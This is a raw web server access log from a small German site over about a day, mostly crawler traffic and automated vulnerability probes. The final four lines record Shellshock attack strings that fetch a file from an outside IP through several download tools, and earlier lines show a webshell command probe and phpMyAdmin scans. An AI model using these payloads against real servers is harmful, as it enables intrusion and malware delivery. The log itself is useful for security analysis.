157.55.39.50 - - [24/Feb/2016:06:38:14 +0100] "GET /berufsbekleidung-ready-to-wear.html HTTP/1.1" 404 348 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
52.53.218.158 - - [24/Feb/2016:07:45:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0 Gecko/20100101 Firefox/36.0"
115.231.222.14 - - [24/Feb/2016:08:08:48 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7781070660414262 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:08:08:50 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1857180065573953 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
104.192.0.21 - - [24/Feb/2016:08:20:42 +0100] "GET /admin/CHANGES HTTP/1.0" 404 314 "-" "-"
104.192.0.21 - - [24/Feb/2016:08:20:42 +0100] "GET /admin/CHANGES HTTP/1.0" 404 314 "-" "-"
104.192.0.21 - - [24/Feb/2016:08:20:42 +0100] "GET /admin/CHANGES HTTP/1.0" 404 314 "-" "-"
104.192.0.21 - - [24/Feb/2016:08:20:42 +0100] "GET /admin/CHANGES HTTP/1.0" 404 314 "-" "-"
111.248.100.164 - - [24/Feb/2016:08:38:29 +0100] "CONNECT 126mx02.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
66.249.66.104 - - [24/Feb/2016:08:49:38 +0100] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.102 - - [24/Feb/2016:08:49:38 +0100] "GET /images/karte-sc-koeln.png HTTP/1.1" 404 338 "-" "Googlebot-Image/1.0"
216.55.186.43 - - [24/Feb/2016:08:54:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [24/Feb/2016:08:54:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
107.150.40.38 - - [24/Feb/2016:09:01:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
157.55.39.68 - - [24/Feb/2016:09:04:15 +0100] "GET /service-schoeneberg.html HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
107.150.40.37 - - [24/Feb/2016:09:05:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.33.62 - - [24/Feb/2016:09:05:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
113.76.90.25 - - [24/Feb/2016:09:39:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)"
107.150.33.58 - - [24/Feb/2016:09:42:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
66.249.66.19 - - [24/Feb/2016:09:55:05 +0100] "GET /robots.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.22 - - [24/Feb/2016:09:55:05 +0100] "GET /livezilla/livezilla.php?template=lz_chat_frame.3.2.login.0.0 HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.25 - - [24/Feb/2016:10:02:46 +0100] "GET /livezilla/images/button_s0.gif HTTP/1.1" 404 338 "-" "Googlebot-Image/1.0"
115.231.222.14 - - [24/Feb/2016:10:21:43 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1281795951147279 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:10:21:43 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.5659382711037664 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:10:21:46 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4346978890172509 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
107.150.40.38 - - [24/Feb/2016:10:24:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
113.76.90.25 - - [24/Feb/2016:10:32:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)"
107.150.40.36 - - [24/Feb/2016:10:59:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.60.74 - - [24/Feb/2016:11:03:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
111.248.102.152 - - [24/Feb/2016:11:07:26 +0100] "CONNECT vip163mx00.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
169.229.3.91 - - [24/Feb/2016:11:15:04 +0100] "s\xe26;\x8c\x1d\xc9\xc4\xc4mv\xe6\xf9\xcd*\x17\xbb\x84\x12o\x9c\xd9\xfbqo\x91\xe8_W\x03\xda\xa8\xa5'P\xc4\x9f\x03\xe7\x12\xa1g9\xcd\b\xdf\xf3" 501 362 "-" "-"
141.212.122.209 - - [24/Feb/2016:11:56:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
113.76.90.25 - - [24/Feb/2016:12:30:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
54.184.98.180 - - [24/Feb/2016:12:34:08 +0100] "GET http://ec2-52-36-223-78.us-west-2.compute.amazonaws.com/owp/ HTTP/1.1" 404 344 "-" "-"
77.125.94.69 - - [24/Feb/2016:13:02:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
77.125.94.69 - - [24/Feb/2016:13:03:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
107.150.40.38 - - [24/Feb/2016:13:37:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
169.229.3.91 - - [24/Feb/2016:14:14:37 +0100] "y?\xb5-\x86\xc0J\xd2~j[\xf2\xa0\xe4\xec\x9a\xc4\xa6\xb3ST%\xbbc" 501 339 "-" "-"
203.158.160.4 - - [24/Feb/2016:14:20:00 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
203.158.160.4 - - [24/Feb/2016:14:20:21 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
203.158.160.4 - - [24/Feb/2016:14:20:42 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.150.33.61 - - [24/Feb/2016:14:24:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
115.231.222.14 - - [24/Feb/2016:14:47:16 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2897339650602517 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
104.255.65.207 - - [24/Feb/2016:15:12:11 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
113.76.90.25 - - [24/Feb/2016:15:16:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)"
54.183.232.142 - - [24/Feb/2016:16:32:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0 Gecko/20100101 Firefox/36.0"
104.255.65.207 - - [24/Feb/2016:16:53:35 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:53:44 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:53:52 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:53:53 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:54:00 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:54:03 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:54:07 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:54:13 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
104.255.65.207 - - [24/Feb/2016:16:54:14 +0100] "GET /admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami HTTP/1.0" 404 324 "-" "-"
115.231.222.14 - - [24/Feb/2016:16:58:57 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6178571971073894 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
66.249.66.25 - - [24/Feb/2016:17:36:30 +0100] "GET /livezilla/livezilla.php?template=lz_chat_frame.3.2.login& HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.68 - - [24/Feb/2016:18:15:49 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.73.179 - - [24/Feb/2016:18:36:14 +0100] "GET /robots.txt HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.192 - - [24/Feb/2016:18:36:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.231.2.191 - - [24/Feb/2016:18:57:54 +0100] "CONNECT vip163mx00.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
115.231.222.14 - - [24/Feb/2016:19:10:58 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0493988360784997 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:19:11:02 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8246991307391944 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
198.20.99.130 - - [24/Feb/2016:19:13:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.99.130 - - [24/Feb/2016:19:13:36 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
198.20.99.130 - - [24/Feb/2016:19:13:36 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
159.203.75.59 - - [24/Feb/2016:20:01:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "Lynx/2.8.5rel.1 libwww-FM/2.15FC SSL-MM/1.4.1c OpenSSL/0.9.7e-dev"
185.35.62.11 - - [24/Feb/2016:21:07:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.35.62.11 - - [24/Feb/2016:21:13:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
115.231.222.14 - - [24/Feb/2016:21:23:40 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6115828045786349 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:21:23:42 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9210447858743828 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:21:23:42 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7141428848087949 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
185.35.62.11 - - [24/Feb/2016:21:24:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
5.39.222.159 - - [24/Feb/2016:21:28:44 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
185.35.62.11 - - [24/Feb/2016:21:35:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.35.62.11 - - [24/Feb/2016:21:36:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.130.5.238 - - [24/Feb/2016:21:46:30 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.238 - - [24/Feb/2016:21:46:30 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.238 - - [24/Feb/2016:21:46:33 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.238 - - [24/Feb/2016:21:46:35 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.238 - - [24/Feb/2016:21:46:36 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.238 - - [24/Feb/2016:21:46:39 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.238 - - [24/Feb/2016:21:46:39 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.130.5.238 - - [24/Feb/2016:21:46:41 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.38.0"
185.35.62.11 - - [24/Feb/2016:21:47:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.35.62.11 - - [24/Feb/2016:22:02:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.35.62.11 - - [24/Feb/2016:22:09:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.35.62.11 - - [24/Feb/2016:22:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.35.62.11 - - [24/Feb/2016:22:29:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.130.5.149 - - [24/Feb/2016:22:41:28 +0100] "GET /xmlrpc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
213.239.205.207 - - [24/Feb/2016:22:47:49 +0100] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
213.239.205.207 - - [24/Feb/2016:22:47:50 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
115.231.222.14 - - [24/Feb/2016:23:35:53 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9323736984917294 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:23:35:53 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2498824878872690 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:23:35:53 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3905300631888104 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:23:35:53 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4995084887844977 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:23:35:53 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1621388632378001 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [24/Feb/2016:23:35:54 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7508437643537437 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
5.39.222.159 - - [24/Feb/2016:23:38:33 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
93.159.230.88 - - [25/Feb/2016:00:10:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)"
5.39.222.159 - - [25/Feb/2016:00:53:16 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
157.55.39.74 - - [25/Feb/2016:01:42:21 +0100] "GET /karriere.html HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
115.231.222.14 - - [25/Feb/2016:01:48:57 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0227999595950114 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [25/Feb/2016:01:48:57 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7584009727192149 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
216.55.186.43 - - [25/Feb/2016:02:12:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
216.55.186.43 - - [25/Feb/2016:02:12:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
5.39.222.159 - - [25/Feb/2016:03:22:42 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
46.105.100.183 - - [25/Feb/2016:04:11:22 +0100] "GET /robots.txt HTTP/1.0" 404 328 "-" ""
46.105.100.183 - - [25/Feb/2016:04:11:22 +0100] "GET / HTTP/1.1" 206 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100625 Gentoo Firefox/3.6.4"
115.231.222.14 - - [25/Feb/2016:06:14:59 +0100] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0526497102088450 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
66.249.73.219 - - [25/Feb/2016:06:27:48 +0100] "GET /robots.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.227 - - [25/Feb/2016:06:27:48 +0100] "GET /livezilla/livezilla.php?template=lz_chat_frame.3.2.login& HTTP/1.1" 404 331 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.39.222.159 - - [25/Feb/2016:06:51:20 +0100] "GET /rom-0 HTTP/1.1" 404 310 "-" "Mozilla/5.0 zgrab/0.x"
64.246.165.140 - - [25/Feb/2016:07:00:36 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [25/Feb/2016:07:00:37 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--essohndler-u5a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
47.88.12.235 - - [25/Feb/2016:07:15:41 +0100] "GET HTTP/1.1 HTTP/1.1" 400 333 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:15:42 +0100] "GET /cgi-bin/php4 HTTP/1.1" 404 317 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:15:48 +0100] "GET /cgi-bin/php5 HTTP/1.1" 404 317 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
47.88.12.235 - - [25/Feb/2016:07:15:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
